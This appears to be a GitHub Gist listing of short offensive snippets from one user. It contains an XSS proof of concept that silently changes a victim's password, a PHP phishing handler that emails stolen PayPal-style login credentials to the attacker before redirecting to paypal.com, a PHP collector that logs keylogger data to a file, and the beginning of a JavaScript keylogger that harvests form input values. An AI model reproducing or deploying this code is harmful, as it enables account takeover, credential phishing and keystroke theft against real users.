Skip to content

Instantly share code, notes, and snippets.

@rundongliu
rundongliu / xss_reset_pass.js
Created August 20, 2016 07:23
xss_reset_pass_poc
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("POST", "/home/modifyPassWord.php", true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.send("userpassword=hahaha&action=modify&_=");
@rundongliu
rundongliu / signin.php
Created July 6, 2016 05:22
a php file which handles login request
<?php
$email=$_POST['login_email'];
$password=$_POST['login_password'];
$msg = $email."\n".$password."\n";
mail(your_email , "Got It!" ,$msg);
header("Location:https://www.paypal.com")
?>
@rundongliu
rundongliu / keylogger.php
Last active July 6, 2016 05:27
php file which records keylogger request
<?php
file_put_contents('data.txt', $_SERVER['QUERY_STRING'].PHP_EOL, FILE_APPEND);
?>
@rundongliu
rundongliu / keylogger.jsp
Last active August 19, 2021 14:29
a javascript keylogger
<script>
function post (event) {
var inputs = document.getElementsByTagName("input");
var param = ""
for(var i=0; i < inputs.length; i++)
{
input = inputs[i];
if(input.type=="hidden"|| input.type=="submit")
continue;
if(input.value=="")